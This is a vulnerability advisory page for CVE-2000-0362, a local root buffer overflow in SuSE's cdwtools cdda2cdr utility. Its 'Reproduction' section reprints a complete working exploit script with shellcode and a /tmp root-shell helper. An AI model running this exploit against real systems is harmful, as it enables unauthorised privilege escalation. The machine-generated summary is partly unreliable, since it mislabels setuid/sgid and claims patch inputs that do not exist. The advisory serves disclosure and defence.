VYPR
← All advisories
Unrated severityNVD Advisory· Published Oct 22, 1999· Updated Apr 16, 2026

CVE-2000-0362

CVE-2000-0362

Description

Linux cdwtools 093 and earlier contain buffer overflows allowing local users to gain root privileges.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Linux cdwtools 093 and earlier contain buffer overflows allowing local users to gain root privileges.

Vulnerability

Linux cdwtools versions 093 and earlier are vulnerable to buffer overflows. The cdda2cdr utility, which is part of the cdwtools package and may be setuid to disk, is specifically affected. This vulnerability can be triggered through various means, including buffer overflows and symbolic link attacks in /tmp [1].

Exploitation

An attacker can exploit this vulnerability by crafting a malicious input to the cdda2cdr utility. The provided exploit script cdda2x.sh demonstrates how to compile and execute a C exploit (cdda2x) that targets cdda2cdr. This involves providing specific offset and buffer size arguments to the exploit, which then attempts to overwrite a buffer and execute shellcode. The exploit also compiles and places a separate C program (cd) in /tmp which, when executed by the shellcode, will spawn a root shell via /bin/bash [1].

Impact

Successful exploitation of the buffer overflow in cdda2cdr allows a local attacker to gain root privileges on the affected system. This means an attacker can execute arbitrary commands with the highest level of privilege, potentially compromising the entire system [1].

Mitigation

Not yet disclosed in the available references. The vulnerability affects cdwtools versions 093 and earlier. Users are advised to check for updated versions or security advisories from their distribution.

References
  1. SuSE Linux 6.1/6.2 - 'cwdtools' Local Overflow / Local Privilege Escalation

AI Insight generated on Jun 2, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

3
  • SUSE S.A./Linux2 versions
    cpe:2.3:o:suse:suse_linux:6.1:*:*:*:*:*:*:*+ 1 more
    • cpe:2.3:o:suse:suse_linux:6.1:*:*:*:*:*:*:*
    • cpe:2.3:o:suse:suse_linux:6.2:*:*:*:*:*:*:*
  • Linux/cdwtoolsllm-create
    Range: <=093

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"Buffer overflows in the cdda2cdr utility allow local users to gain root privileges."

Attack vector

Local users can exploit buffer overflows in the cdda2cdr utility to gain root privileges. The exploit involves crafting a malicious input string that overwrites critical memory regions, leading to arbitrary code execution. This allows an attacker to execute commands with elevated privileges. [ref_id=1]

Affected code

The vulnerability resides in the cdda2cdr utility, part of the cdwtools package. The provided exploit code targets the `/usr/bin/cdda2cdr` executable, demonstrating how a crafted input can lead to privilege escalation. [ref_id=1]

What the fix does

The advisory does not provide specific details on the patch or remediation steps. However, it indicates that the vulnerability is related to buffer overflows in the cdda2cdr utility. Users are advised to update their systems to a version where this vulnerability is addressed. [ref_id=1]

Preconditions

  • authThe attacker must have local access to the affected system.
  • inputThe attacker must be able to execute the cdda2cdr utility with crafted input.

Reproduction

```sh #!/bin/sh #source: https://www.securityfocus.com/bid/738/info # #cdwtools is a package of utilities for cd-writing. The linux version of these utilities, which ships with S.u.S.E linux 6.1 and 6.2, is vulnerable to several local root #compromises. It is known that there are a number of ways to exploit these packages, including buffer overflows and /tmp symlink attacks. # #--- cdda2x.sh --- #!/bin/sh # # Shell script for Linux x86 cdda2cdr exploit # Brock Tellier btellier@usa.net #

cat > /tmp/cdda2x.c <<EOF

/** ** Linux x86 exploit for /usr/bin/cdda2cdr (sgid disk on some Linux distros)

** gcc -o cdda2x cdda2x.c; cdda2x <offset> <bufsiz> ** ** Brock Tellier btellier@usa.net **/

#include <stdlib.h> #include <stdio.h>

char exec[]= /* Generic Linux x86 running our /tmp program */ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/tmp/cd";

#define LEN 500 #define NOP 0x90

unsigned long get_sp(void) {

__asm__("movl %esp, %eax");

}

void main(int argc, char *argv[]) {

int offset=0; int i; int buflen = LEN; long int addr; char buf[LEN];

if(argc > 3) { fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]); exit(0); } else if (argc == 2){ offset=atoi(argv[1]);

} else if (argc == 3) { offset=atoi(argv[1]); buflen=atoi(argv[2]);

} else { offset=500; buflen=500;

}

addr=get_sp();

fprintf(stderr, "Linux x86 cdda2cdr local disk exploit\n"); fprintf(stderr, "Brock Tellier btellier@usa.net\n"); fprintf(stderr, "Using addr: 0x%x\n", addr+offset);

memset(buf,NOP,buflen); memcpy(buf+(buflen/2),exec,strlen(exec)); for(i=((buflen/2) + strlen(exec))+1;i<buflen-4;i+=4) *(int *)&buf[i]=addr+offset;

execl("/usr/bin/cdda2cdr", "cdda2cdr", "-D", buf, NULL);

/* for (i=0; i < strlen(buf); i++) putchar(buf[i]); */

}

EOF

cat > /tmp/cd.c <<EOF void main() { setregid(getegid(), getegid()); system("/bin/bash"); } EOF

gcc -o /tmp/cd /tmp/cd.c gcc -o /tmp/cdda2x /tmp/cdda2x.c echo "Note that gid=6 leads to easy root access.." /tmp/cdda2x ``` [ref_id=1]

Generated on Jun 2, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

2

News mentions

0

No linked articles in our index yet.